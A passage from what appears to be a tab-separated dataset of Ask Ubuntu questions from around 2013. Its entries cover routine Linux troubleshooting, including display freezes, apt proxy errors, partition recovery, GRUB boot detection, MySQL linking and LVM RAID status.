text-x-generic-symbolic.svg libreoffice4.0-oasis-database.svg libreoffice4.0-oasis-presentation.svg libreoffice4.0-oasis-text-template.svg video-x-generic-symbolic.svg libreoffice4.0-oasis-drawing.svg libreoffice4.0-oasis-presentation-template.svg libreoffice4.0-oasis-web-template.svg x-office-calendar-symbolic.svg [ 08:31 am ] /usr/share/icons/gnome/scalable/mimetypes $ ( i installed libreoffice which is n't included by default on lubuntu . ) for example , icons for html and pdf are n't here though they are present in , for example , /usr/share/icons/lubuntu/mimes/16 . then , if one compares the sizes by looking at the contents of the .svg files , the icons for libreoffice components are ~ 256x256 whereas the others are 16x16 . in short : what is the purpose of /usr/share/icons/gnome/scalable/mimetypes/ ? why are so few icons there ? why do the sizes differ ?
292348	problem with video playback ubuntu 12.04 lts	hardware : processor- intel pentium ( r ) 4 2.8 ghz , 1gb ram , graphics unknown switched over from windows xp to ubuntu 12.04 lts recently . horrible problems with audio and video playback . i am a new user . please help
292352	optimize ubuntu 13.04 for netbook ( dell mini 10v )	i have some slight glitches running ubuntu 13.04 in my old beloved dell mini 10v . how can i optimize the graphics for it ? it has got 1gb of ram and an n270 atom processor . very minimal graphics too .
292354	is there a way to upgrade nautilus 3.5 on ubuntu 12.04 ?	i would like to keep my lts 12.04 instead of upgrading for the moment , i would like to have same icons and nautilus of 13.04 . is there a way to do this with out having to upgrade or is just a pain in the head do this ? .
292356	i made a icon for burg in ubuntu 12.04 but icon not shown	i made a icon for burg in ubuntu 12.04 but icon not shown ? ? help image format .png and i set to rgb with size 128x128 px in photoshop but it is'nt working in my burg , ,can anyone tell me how to save image icon for burg ! ?
292358	configure thunderbird to use google contacts for suggestions	how can i configure thunderbird to make suggestions on partial e-mail addresses or names while composing an e-mail ? i already have imported my google contacts as an address book , but it appears that thunderbird will only make suggestions from the local address book .
292361	blank screen after login for all users - version 13.04	blank screen getting displayed after login with any of the user . i have tried few solutions from ask ubuntu . but still i could nt solve it . mother board inter 865 pentium hyperthread processor 2.6 ghz 5:1 creative sound blaster card , graphics card inter 82865g adaptor . ram transcent 1.5 gb - 400 mhz . please help me on this . and let me know which log file i need to look for the exact issue . it does not produce actual problem in reporting problem dialog . so i could not send the actual problem . thanks
292368	download menu pops up after every new tab is opened	i recently installed dropbox on ubuntu , the install went perfectly fine and dropbox is functioning normally . however , now every time i open a new tab in firefox i am promoted with the download menu for the dropbox .deb package even though i already have it installed . i 've tried re-downloading , saving , opening , everything . thanks ! drew
292372	how to install ktechlab in ubuntu 13.04 ?	i 'm trying to install the ktechlab in ubuntu 13.04 but the .deb has some dependecies errors and it is not available in the software center .
292374	how do i set the position of a cinnamon desklet ?	i 'm using cinnamon 1.8 and tried out it 's native desklets . but neither could i figure out myself nor find any documentation on how a desklet 's position is defined .
292375	data/partition recovery help needed	i have installed ubuntu 13.04 over my windows 7 . while installing ubuntu , i have made some mistake and my all partitions are gone . previously there were 5 partitions ( ntfs ) of 200 gb on windows 7 . but now i can see only 1 partion ( ext4 ) of 1 tb in ubuntu system . unfortunately , i ca n't access my data now . anybody can help me in this please ? can i recover my data / partitions ? i have only installed ubuntu 13.04 , i have n't installed any other software on my ubuntu . many thanks in advance .
292377	how to fix anacron & cups-pdf when you have /var on tempfs	i have a ssd drive in my laptop and i followed various advice that said to put /var/log /var/spool & /var/cache on a tmpfs so that the constant read/writes would n't lessen the life of my ssd . however , anacron now does n't start and the error message in /var/log/syslog says anacron [ 4169 ] : ca n't chdir to /var/spool/anacron : no such file or directory kernel : [ 3037.851604 ] init : anacron main process ( 4169 ) terminated with status 1 cups-pdf has a similar problem and complains that /var/spool/cups-pdf does n't exist . i 've checked and /var/spool/ and it 's true neither of these exist . if i create these directories manually both processes run . but after i restart the directories are gone again . how do i make them exist permanently ?
292382	ubuntu 13 online accounts keeps closing	im on ubuntu 13 now , whenever i open online accounts or accounts in empathy my accounts page comes up for a few seconds then closes , so i cant add accounts ? tried restarting and running an update , still happens ...
292385	can i eliminate windows 8 as i install ubuntu studio ?	i ca n't seem to get any of the instructions online here to work . i have yet to get ubuntu to boot at all . i have a new laptop with windows 8 and i am happy to completely eliminate w8 and start fresh with ubuntu studio . if you can help , send me the instructions .
292388	sudo apt-get update command does not work	i 'm trying to install java onto my ubuntu 11.10 . i 've managed to get some repositories from where to download the installer , but whenever it gets to the point of updating the resources ( a.k.a . sudo apt-get update ) , it dies . and now , let me explain what i mean by death : so when it starts updating , it automatically tries to connect to port 8080 , which takes some time . after that it gets this error message that it could n't resolve port 8080 . the % loader gets to @ 25 and than it stops indefinitely . i do n't know what to do . i 've tried accessing from my local ( home ) network , from my working network ( and from my university network also ) , and it still shows the same errors . i will post now the console messages that keeps spawning when it tries to update the resources : root @ ubuntu : /home/lucaciandrei # apt-get update ign http : //ppa.launchpad.net oneiric inrelease ign http : //archive.ubuntu.com oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease err http : //archive.ubuntu.com oneiric release.gpg something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) ign http : //ppa.launchpad.net oneiric inrelease ign http : //archive.ubuntu.com oneiric release ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease err http : //ppa.launchpad.net oneiric release.gpg something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) ign http : //archive.ubuntu.com oneiric/universe translationindex err http : //ppa.launchpad.net oneiric release.gpg something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) err http : //ppa.launchpad.net oneiric release.gpg something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) err http : //ppa.launchpad.net oneiric release.gpg something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) err http : //ppa.launchpad.net oneiric release.gpg something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) ign http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric/main translationindex err http : //archive.ubuntu.com oneiric/universe amd64 packages something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com oneiric/universe i386 packages something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) ign http : //ppa.launchpad.net oneiric/main translationindex err http : //archive.ubuntu.com oneiric/universe translation-en_us something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com oneiric/universe translation-en something wicked happened resolving 'proxy:8080 ' ( -5 - no address associated with hostname ) 25 % [ connecting to proxy ] ps : i 've searched on google/stackoverflow , but no answer seemed reasonable for my problem . the dns are ok , nothing changed there . also , i used google 's public dns and server , still no update on the situation . i do n't use any proxy settings , that 's the weirdest part . it 's set to off , applied system wide . tried to do it by the ubuntu software center , still no updates , the same thing : stuck at updating the resources . also , i 've seen a lot of advices to ping certain websites , such as google : i did , and it worked , and i received data , but still , no real solution to this matter at hand . edit : well , i found a way around this situation . the link which oli provided helped me . i went into my file /etc/apt/apt.conf and it was like this : acquire { retries `` 0 '' ; http { proxy `` http : //proxy:8080 '' ; } ; } ; so what i did was to comment the lines regarding the proxy acquire { # retries `` 0 '' ; # http { # proxy `` http : //proxy:8080 '' ; # } ; } ; and that solved my proxy-connection problem . now i 'm dealing with some errors related to java as an installer . ( extracted java from the .tar.gz file i 'd downloaded from oracle , put it into my /usr/lib/jvm folder , but it wo n't actually let me use it , saying that lucaciandrei @ ubuntu : ~ $ java -version bash : /usr/bin/java : no such file or directory ) but that 's another question , for another topic . thanks for your responses , oli response will be mark as accepted , since it provided the work-around to my problem .
292394	how to completely remove unity , and replace it with cinnamon ?	i installed cinnamon 1.8 on ubuntu 13.04 , and now i would like to completely remove unity and everything related to it , but i 'd like to keep the programs , lightdm and software center . what packages should i remove ?
292395	restoring settings and packages to clean install	i recently backed up my entire filesystem to a network drive in order to allow me to delete the ubuntu partition , move the partition on the disk and reinstall . i then attempted to copy all of the filesystem back over , but this presented me with little joy . i installed ubuntu ( of the same version as the last 12.10 ) onto the new partition ( s ) and then copied the files over using rsync . long story short , that did n't work - i kept getting it boot inton low graphics mode , i could drop out to a command line but it would n't let me sign in etc . i 'm no longer interested in re-doing that . so i re-installed 12.10 again and instead just copied over the home partition , which has given me my files back . great . now i just want my packages and , if possible , my settings . is it possible to extract this from the backup somehow ? i 'm more interested in the packages than the settings . can i get a list of the packages from the backup files and then run apt-get to re-install them again ? many thanks , luke
292401	change the default screenshot destination folder of `` prnt scrn '' key ?	hello everybody , my prnt scrn key is not working after deleting the pictures folder . i tried to add a folder without any success . i thought changing the destination folder may work so how i do that ?
292405	alt tab in ubuntu	there is this minor detail in ubuntu that if i am running two terminals at the same time , and i want to chose one of them using alt-tab i ca n't instantaneously do it , rather than i have to wait on the terminal icon and then the two terminals will show . ca n't i edit this to show all opened tabs of the same program instantly at the major row of the alt-tab ?
292408	screen resolution issue on ubuntu 13.04 installed under virtualbox	i have host os -windows-7 and guest os -ubuntu 13.04 . problem is when i open any web-page in browser e.g firefox , i ca n't see the bottom of web-page . i 'm facing same issue with remote desktop connection using remmina rdc .
292411	hollow progress bars in ubuntu 13.04 software center	i 've noticed in ubuntu 13.04 ( and 12.10 ) that the progress bars in the software center have a transparent space in the middle , not solid orange , which shows the color of the background behind it . it 's nit-picky but i was wondering if there is a way to fix this .
292417	xfce4-session segfault , suspend and hibernate not working	i am experiencing some critical bugs during a critical time ( finals week ) and could really appreciate some life-saving help . i have posted about it at https : //bugzilla.xfce.org/show_bug.cgi ? id=10068 , but have yet to receive a response from a xfce developer .
292425	ubuntu 13.04 near-fresh install : 'ps aux ' gets stuck on anacron	i 've just finished an install of ubuntu 13.04 onto a brand new pc , and noticed that executing 'ps aux ' in a terminal causes it to hang half-way through displaying a list of the processes : $ ps aux user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.0 27076 2872 ? ss 15:20 0:00 /sbin/init root 2 0.0 0.0 0 0 ? s 15:20 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s 15:20 0:00 [ ksoftirqd/0 ] [ ... trimmed ... ] root 1207 0.0 0.0 20972 996 tty6 ss+ 15:20 0:00 /sbin/getty -8 38400 tty6 root 1219 0.0 0.0 70428 2812 ? ss 15:20 0:00 /usr/sbin/cups-browsed ... and it stops there , without returning to the command prompt . pressing ctrl-c to try to abort the listing does n't terminate ps , and just displays ^c in the terminal . curious , i ran strace on it , and found ps was blocking on a read ( ) call while trying to fetch the command line for the anacron process : [ ... trimmed ... ] write ( 1 , `` root 1207 0.0 0.0 20972 `` ... , 91root 1207 0.0 0.0 20972 996 tty6 ss+ 15:20 0:00 /sbin/getty -8 38400 tty6 ) = 91 stat ( `` /proc/1219 '' , { st_mode=s_ifdir|0555 , st_size=0 , ... } ) = 0 open ( `` /proc/1219/stat '' , o_rdonly ) = 6 read ( 6 , `` 1219 ( cups-browsed ) s 1 1219 121 '' ... , 1023 ) = 193 close ( 6 ) = 0 open ( `` /proc/1219/status '' , o_rdonly ) = 6 read ( 6 , `` name : \tcups-browsed\nstate : \ts ( sle '' ... , 1023 ) = 777 close ( 6 ) = 0 open ( `` /proc/1219/cmdline '' , o_rdonly ) = 6 read ( 6 , `` /usr/sbin/cups-browsed\0 '' , 131072 ) = 23 read ( 6 , `` '' , 131049 ) = 0 close ( 6 ) = 0 stat ( `` /etc/localtime '' , { st_mode=s_ifreg|0644 , st_size=331 , ... } ) = 0 stat ( `` /etc/localtime '' , { st_mode=s_ifreg|0644 , st_size=331 , ... } ) = 0 write ( 1 , `` root 1219 0.0 0.0 70428 `` ... , 88root 1219 0.0 0.0 70428 2812 ? ss 15:20 0:00 /usr/sbin/cups-browsed ) = 88 stat ( `` /proc/1239 '' , { st_mode=s_ifdir|0555 , st_size=0 , ... } ) = 0 open ( `` /proc/1239/stat '' , o_rdonly ) = 6 read ( 6 , `` 1239 ( anacron ) d 1 1239 1239 0 - '' ... , 1023 ) = 189 close ( 6 ) = 0 open ( `` /proc/1239/status '' , o_rdonly ) = 6 read ( 6 , `` name : \tanacron\nstate : \td ( disk sle '' ... , 1023 ) = 772 close ( 6 ) = 0 open ( `` /proc/1239/cmdline '' , o_rdonly ) = 6 read ( 6 , incidentally , trying to do this also results in a hang : $ cat /proc/1239/cmdline i 've found a few other posts by others which have seen this particular phenomenon , but it seems no one has found a solution yet . http : //unix.stackexchange.com/questions/10980/suggestions-needed-to-debug-why-ps-ef-gets-stuck http : //serverfault.com/questions/257764/suggestions-needed-to-debug-why-ps-ef-gets-stuck this is a nearly fresh install of ubuntu 13.04 . i just downloaded the .iso from the ubuntu downloads page last night , installed it via usb , and have installed all of the latest updates . after the install , i added a couple of other applications ( nvidia-current , virtualbox , audacity , audacious , google chrome , and vlc ) , but did n't notice this issue with ps until just now . hardware specs : intel i7-3930k @ 3.20ghz , 16gb ram , nvidia geforce gtx 680 ( 304.88 drivers ) . has anyone else experienced this issue before ? is there a workaround or kernel patch available ?
292427	web browser is having problem on processing js in utf-8	i am using firefox 20.0 , but once i was browsing a website ( chinese ) and the lunar calendar javascript got something like nan or undefined . the website has been tested under ipod , firefox in windows ( also the latest version ) and even gentoo linux with konqueror and firefox . the javascript is here : http : //www.hanchc.com/static/js/nongli.js the minimum test page is http : //fitgirl.org/testpage.htm ( chinese ) application that might related to this post are with these versions : ~ # firefox -- version mozilla firefox 20.0 > ~ # uname -a linux steph-zhang 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux
292428	hostapd compile error	while trying to build hostapt i get the following error . make ../src/crypto/tls_openssl.c:17:25 : fatal error : openssl/ssl.h : no such file or directory compilation terminated . make : *** [ ../src/crypto/tls_openssl.o ] error 1 i am trying to create a infrastructure mode hotspot with ubuntu 13.04 without using router , mainly for my android phone . i am using this guide .
292430	npm wont work because of my wrong node version	the error is : error : npm does n't work with node v0.5.11-pre required : node @ > =0.6 but i'v just updated my node . that is confusing . i'v made some digging and it seems that i 've installed node two times node version is v0.5.11-pre ( node -v ) and my nodejs version is v0.10.5 ( nodejs -v ) when i check the usr/bin there is a link named 'node ' and there is a application named 'nodejs ' . the link points to /etc/alternatives/node link and this link points back to usr/bin/nodejs application . i 'whereis ' to the nodejs and node . these are output : whereis node : /usr/bin/node /usr/bin/x11/node /usr/local/bin/node /usr/local/lib/node /usr/share/man/man1/node.1.gz whereis nodejs : /usr/bin/nodejs /usr/lib/nodejs /usr/bin/x11/nodejs /usr/include/nodejs /usr/share/nodejs /usr/share/man/man1/nodejs.1.gz edit1 : i 've also tried apt-get remove node and apt-get remove nodejs intrestingly when i tried node command it still works .
292433	stuffing in multiple bootable iso 's on the same pendrive	i recently installed ubuntu 13.04 from a bootable 8gb usb pendrive which was created using power iso when i was on windows.is there a way of stuffing in another bootable windows and a freebsd iso file into the same 8gb pendrive in order to set up either a dual or a triple boot pc ? i 'll be interested in knowing both command line tools and gui that are available in the linux version that i 'm currently running .
292436	how to make thunderbird obey locale ?	my system locale is en_dk.utf8 and i want iso-dates ( yyyy-mm-dd ) everywhere . % locale lang=en_us.utf-8 language=en_dk : en lc_ctype= '' en_dk.utf8 '' lc_numeric= '' en_dk.utf8 '' lc_time= '' en_dk.utf8 '' lc_collate= '' en_dk.utf8 '' lc_monetary= '' en_dk.utf8 '' lc_messages= '' en_dk.utf8 '' lc_paper= '' en_dk.utf8 '' lc_name= '' en_dk.utf8 '' lc_address= '' en_dk.utf8 '' lc_telephone= '' en_dk.utf8 '' lc_measurement= '' en_dk.utf8 '' lc_identification= '' en_dk.utf8 '' lc_all=en_dk.utf8 if i start thunderbird from the command line , the dates are correct . however , when starting it from a menu , the dates are in mm/dd/yyyy-format no matter what i do . i 've tried configdate and quicklocaleswitcher , none of them are capable of changing the date-format in thunderbird if started from a menu . i 've also tried setting things in dconf , same result : % dconf write /com/canonical/indicator/datetime/time-format `` 'custom ' '' % dconf write /com/canonical/indicator/datetime/custom-time-format `` ' % f % r ' '' so : how can i force thunderbird to use the date format i want , even when started from a menu ?
292437	lvm2 builtin raid - how to check raid status	i just created lvm2 builtin raid1 ( something like lvm mirrir , but newer ) with lvconvert -- type raid1 -m1 /dev/ubuntu/root /dev/sdb5 , ubuntu 12.10 . how can i check mirror status/health both in command-mode and in gui from non-root ? there are my vgs , pvs , lvs ( root-only , needed to open /dev/mapper/control ) : # vgs vg # pv # lv # sn attr vsize vfree ubuntu 2 2 0 wz -- n- 27.52g 916.00m # pvs pv vg fmt attr psize pfree /dev/sda5 ubuntu lvm2 a -- 13.76g 408.00m /dev/sdb5 ubuntu lvm2 a -- 13.76g 508.00m # lvs lv vg attr lsize pool origin data % move log copy % convert root ubuntu rwi-aom- 13.26g 100.00 swap_1 ubuntu -wi-ao -- 100.00m # lvs -a lv vg attr lsize pool origin data % move log copy % convert root ubuntu rwi-aom- 13.26g 100.00 [ root_rimage_0 ] ubuntu iwi-aor- 13.26g [ root_rimage_1 ] ubuntu iwi-aor- 13.26g [ root_rmeta_0 ] ubuntu ewi-aor- 4.00m [ root_rmeta_1 ] ubuntu ewi-aor- 4.00m swap_1 ubuntu -wi-ao -- 100.00m my /proc/mdstat is empty : # cat /proc/mdstat personalities : [ raid6 ] [ raid5 ] [ raid4 ] [ raid1 ] [ linear ] [ multipath ] [ raid0 ] [ raid10 ] unused devices : < none > # there are files from my /dev/mapper , most are symlinks to dm-* : control ubuntu-root - > ../dm-4 ubuntu-root_rimage_0 - > ../dm-1 ubuntu-root_rimage_1 - > ../dm-3 ubuntu-root_rmeta_0 - > ../dm-0 ubuntu-root_rmeta_0 - > ../dm-2 ubuntu-swap_1 - > ../dm-5 there are messages from my dmesg : md/raid1 : mdx : active with 2 out of 2 mirrors created bitmap ( 14 pages ) for device mdx mdx : bitmap initialized from disk : read 1 pages , set 42 of 27152 bits ext4-fs ( dm-4 ) : mounted filesystem with ordered data mode . opts : ( null ) ( is it normal that some bits are set in bitmap ? ) my dmsetup ( root only too ) : # dmsetup table ubuntu-root_rimage_1 : 0 27803648 linear 8:21 10240 ubuntu-root_rimage_0 : 0 27803648 linear 8:5 2048 ubuntu-swap_1 : 0 204800 linear 8:5 27805696 ubuntu-root : 0 27803648 raid raid1 3 0 region_size 1024 2 252:0 252:1 252:2 252:3 ubuntu-root_rmeta_1 : 0 8192 linear 8:21 2048 ubuntu-root_rmeta_0 : 0 8192 linear 8:5 28010496 ( is my raid setup correct ? )
292440	right click menu of firefox 20 does not work in ubuntu12.04 amd64 ?	after i update firefox to version 20 , right-click on the web page gives almost all of menu list . i use firefox 'menu editor ' extension to cancel some list items in right-click menu , but i find some list items do not work such as 'save link as ... ' . is here anyone who meet the same problem ?
292459	ati mobility radion 4650 drivers on ubuntu 13.04	hi i just updated from 12.04 to 13.1 and the first thing i did was try and install the official ati drivers from there site . after downloading while installing the drivers i get a message that says one or more tools are missing and i should see fglrx.log . when i open that /lib/modules/3.8.0-19-generic/build/include/linux/version.h can not be found on this system . also ubuntu recognises the graphics card as a gallium 0.4 on amd rv730 which im guessing is cause of the open source drivers . but the performance is poor and i 'm asking for help to improve opengl gaming performance on my pc also are there drivers for my i5 cpu to help improve performance ? system specs : intel® core™ i5 cpu m 460 @ 2.53ghz × 4 ati mobility radion 4650 ubuntu 13.04 64-bit
292461	placing $ home directory on nfs server	i have a number of client machines , all running ubuntu , and recently upgraded to 13.04 . i also have a slackware-based server which includes an nfs service . what i am aiming to do is to have access to all my documents from any client . i have copied my entire $ home directory to the fileserver . i have used usermod -d to set my home directory to the appropriate area on the server . i use autofs to mount remote directories , so the full path is /net/tower/mnt/user/userhome/peter . if i log in via a text console , all is fine - my files are accessible and writable . however , if i log in via desktop , i get an error : could not update iceauthority file with the full path/filename for the .iceauthority file . i have ensured that ownership and priveledges/permissions on the file are correct . i have tried deleting the file , i have tried creating an empty file from a text console - i still get the error . either i have to find a way of getting past this error , or find a way to change my $ home after login ( from my .profile ? ) . can anyone help me ?
292462	does the search field on the launcher in kde depend on nepomuk ?	does the search field on the application launcher depend on nepomuk ? i had to disable nepomuk on shared systems because it takes too much cpu and i/o and i have noticed that on some systems the search field for programs does not show newly installed programs . does that function depend on nepomuk file indexing ?
292465	no scrolling with wacom bamboo on ubuntu 13.04	i have installed ubuntu 13.04 ( 64 bit ) on my desktop a couple of days ago . everything works fine out of the box , including the basic functions of my wacom . however , i ca n't scroll with my wacom ( pressing lower button and dragging up and down ) . another thing that is missing from the wacom settings , is to make the right mouse click a 'click-and-tap ' . if i press the upper button , it immediately fires a right mouse click . i want it to fire when i press the upper button and than tap the pen on the wacom . how can i enable these two functions for my wacom on ubuntu ?
292469	running native ubuntu installation from fusion or parallels	my intention is to buy a macbook ( retina ) and triple boot it , with osx , w7 and ubuntu ( > = 12.04 , i still have to see which one offers the best compatibility ) . i found guides that explain how to do it without using the hybrid mbr , since all of these oses are gpt aware . so far so good . however , i would like to be able to run either of the two additional oses both natively and virtualized . this means that the virtual machine ( parallels , fusion or virtualbox ) will be requested ( by me ) to run the os from the physical partition . now , i already tried this with windows 7 on a macbook , and it works nicely , without messing up anything ( means i can boot one day from parallels , the next day natively , and everything is fine , even after installing parallels additions or whatever they are called ) . my question is about ubuntu . i have not tried it , but i can reasonably expect that some things , for example the video drivers , are different in the two modes . since these settings are normally stored in files ( xorg.conf , for example ) , how easy is to interchangeably boot a native ubuntu both natively and virtualized ? ps : i know there will be some answers like `` why do you ever want to do that ? '' or other non constructive comments . the reason why i want to do this is because we all know that these alternative oses do not play nicely with the battery of the mac , when ran natively . so i want to be able to run them from osx when i will be on battery , to extend the usage range . on the other side , i want to be able to run natively these os in order to use the graphic hardware directly ( gpgpu and stuff like that ) update : i was also wondering : does parallels or fusion allow the guest to mount a physical partition ( obviously if not mounted on the host ) ?
292471	ubuntu 13.04 screen freezing	i have some issues with my ubuntu 13.04 upgrade . from time to time everything on the screen except mouse pointer freezes forever . ctrl+alt+f1 ( and so on ) still works : if there is animation on screen , i could switch to console screen then back to primary screen to see updated animation that freezes on the new frame . using adobe flash makes freeze come earlier , connecting large screen through hdmi or playing some steam games speeds it up too ( adobe flash + hdmi screen + clojure kills my laptop instantly : ) ) . looks like something is buggy in hardware acceleration . is there a way to locate this bug more precisely to send to canonical more detailed bugreport ? or is this issue already solved ? tech info : processor : intel® core™ i5-2410m cpu @ 2.30ghz × 4 graphics : intel hd graphics 3000 ssd , 8gb ram
292472	how to make all filetypes open in a certain program ?	i want every filetype to open in leafpad . i tried to edit /usr/share/applications/defaults.list to associate file types . but i want all filetypes to open in a certain program , with maybe something like \*/*=leafpad.desktop how to do it ?
292474	how to fix ubuntu server 13.04 slower boot when network cable is unplugged	i have noticed that when i unplug the network cable , system waits about 100 seconds to configure the network , so i edited /etc/init/failsafe.conf and comment two wait ( ) lines ( thanks to tutorial here ) # plymouth errors should not stop the script because we *must* reach # the end of this script to avoid letting the system spin forever # waiting on it to start . $ plymouth message -- text= '' waiting for network configuration ... '' || : # sleep 40 $ plymouth message -- text= '' waiting up to 60 more seconds for network configuration ... '' || : # sleep 59 $ plymouth message -- text= '' booting system without full network configuration ... '' || : then i grab a timer and start counting seconds of boot time , the odd thing is it takes 15 more seconds to boot a system with an unplugged network cable that a system with a plugged network cable . and most of the delay is in this line that appears on start up : the disk driver for servername -- vg-swap1 not ready my home folder is encrypted and ubuntu has been installed with lvm . maybe you say `` so what harm can come from 15 more seconds of delay ? '' well , i am configuring this server to be used in a traffic control system and in case of power failure the system should be back on its feet as soon as possible , so every second counts . thank you .
292476	g++ fails to link to libmysqlclient	i use ubuntu 12.04 on a virtual machine on my macbookpro . i installed build-essential , mysql-server and libmysqlclient-dev . both commands 'mysql ' and 'mysql_config ' work . however , the following program does not link : # include < stdio.h > # include < unistd.h > # include < mysql.h > int main ( int argc , char *argv [ ] ) { printf ( `` hello world\n '' ) ; //init { mysql itsmysql ; mysql* mytemp=0 ; mytemp=mysql_init ( & itsmysql ) ; if ( mytemp ) { printf ( `` hello world yep\n '' ) ; } else { printf ( `` hello world noooo\n '' ) ; } } return 0 ; } i run g++ with the command : g++ `mysql_config -- cflags` `mysql_config -- libs` test.cpp i had this running under a 32 bit version of ubuntu , but now i have a 64 bits version . the problem occurs both using virtualbox as with parallels . the output of 'mysql_config ' looks ok . it seems to me that the linker can not find the appropriate file/architecture type amongst the libmysqlclient files . what should i try next ? the error message is 'undefined reference to mysql_init ' .
292481	second operating system on ssd doesnt seem on grub menu	i have ssd and a hdd i installed ubuntu on hdd , after this fedora on ssd however on grub menu only ubuntu appears . i am uploading the text file of boot info script please help . boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 99 for . sda1 : __________________________________________ file system : ext2 boot sector type : - boot sector info : operating system : ubuntu 13.04 boot files : /boot/grub/grub.cfg /etc/fstab /boot/extlinux/extlinux.conf sda2 : __________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : /grub2/grub.cfg sdb2 : __________________________________________ file system : lvm2_member boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _______________________________________ disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 476,096,511 476,094,464 83 linux /dev/sda2 476,098,558 488,396,799 12,298,242 5 extended /dev/sda5 476,098,560 488,396,799 12,298,240 82 linux swap / solaris drive : sdb _______________________________________ disk /dev/sdb : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 2,048 1,026,047 1,024,000 83 linux /dev/sdb2 1,026,048 117,229,567 116,203,520 8e linux lvm '' blkid '' output : ____________________________________ device uuid type label /dev/sda1 5894b892-2ac5-4f5d-a65d-1adc979c7b4a ext2 /dev/sda5 2afdc36a-55b4-4ae2-8933-90bad39cc23f swap /dev/sdb1 e24bbc02-6195-4cc3-8760-6e96458ace18 ext4 /dev/sdb2 cu6hgj-6ose-y4pv-sefj-udrj-8lf3-dwgom4 lvm2_member ================================ mount points : ================================= device mount_point type options /dev/sda1 / ext2 ( rw , errors=remount-ro ) /dev/sdb1 /media/ty-1/e24bbc02-6195-4cc3-8760-6e96458ace18 ext4 ( rw , nosuid , nodev , uhelper=udisks2 )
292485	unable to find cd-rom	i 've tried installing msoffice 2007 using playonlinux but it is unable to find cdrom please suggest any idea to solve the problem
292492	eclipse : tooltip quickfix suggestions are not displaying correctly in ubuntu	i am new to eclipse in ubuntu , at first eclipse tooltip shows only black , then i installed gnome-color-chooser and change the tooltip background and foreground color as displayable , but after the quick fix links are only 2 or 3 words displaying . as shown the import statements and change to statements and other statements are not displaying correctly . help me to solve this issue .
292494	multiple keyboard shortcuts for same command	is it possible to assing multiple keyboard shortcuts for same default command . i want to switch between worspaces with ctrl+numpad_1 and with ctrl+1 too . or how to add custom command for switching ?
292496	which window manager is most similar to ms windows ?	background : i 'm changing a lot of desktop environments every day , and i 'd like to some uniformity between them to keep my productivity up . so , which window-manager can be installed in ubuntu that has most similar functionality , usability to ms-windows ? e.g . : open/save file dialog , alt-tab behavior , main key bindings . is there such a window manager ?
292497	ubuntu 13.04 wired connection is not working	after upgrading to 13.04 i ca n't make wired connection work ( wireless internet works fine ) . i checked in connection settings that it 's supposed to connect automatically . ifconfig gives : eth0 link encap : ethernet hwaddr e8 : e0 : b7:4e:4e:55 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : c0700000-c0720000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:699 errors:0 dropped:0 overruns:0 frame:0 tx packets:699 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:87573 ( 87.5 kb ) tx bytes:87573 ( 87.5 kb ) wlan0 link encap : ethernet hwaddr 9c : b7:0d:96 : e9:52 inet6 addr : fe80 : :9eb7 : dff : fe96 : e952/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:4889 errors:0 dropped:0 overruns:0 frame:0 tx packets:2250 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1909434 ( 1.9 mb ) tx bytes:339972 ( 339.9 kb ) lshw -c network : *-network description : ethernet interface product : 82579v gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : e8 : e0 : b7:4e:4e:55 width : 32 bits clock : 33mhz capabilities : pm msi cap_list ethernet physical configuration : broadcast=yes driver=e1000e latency=0 multicast=yes resources : irq:20 memory : c0700000-c071ffff memory : c072b000-c072bfff ioport:2080 ( size=32 ) *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 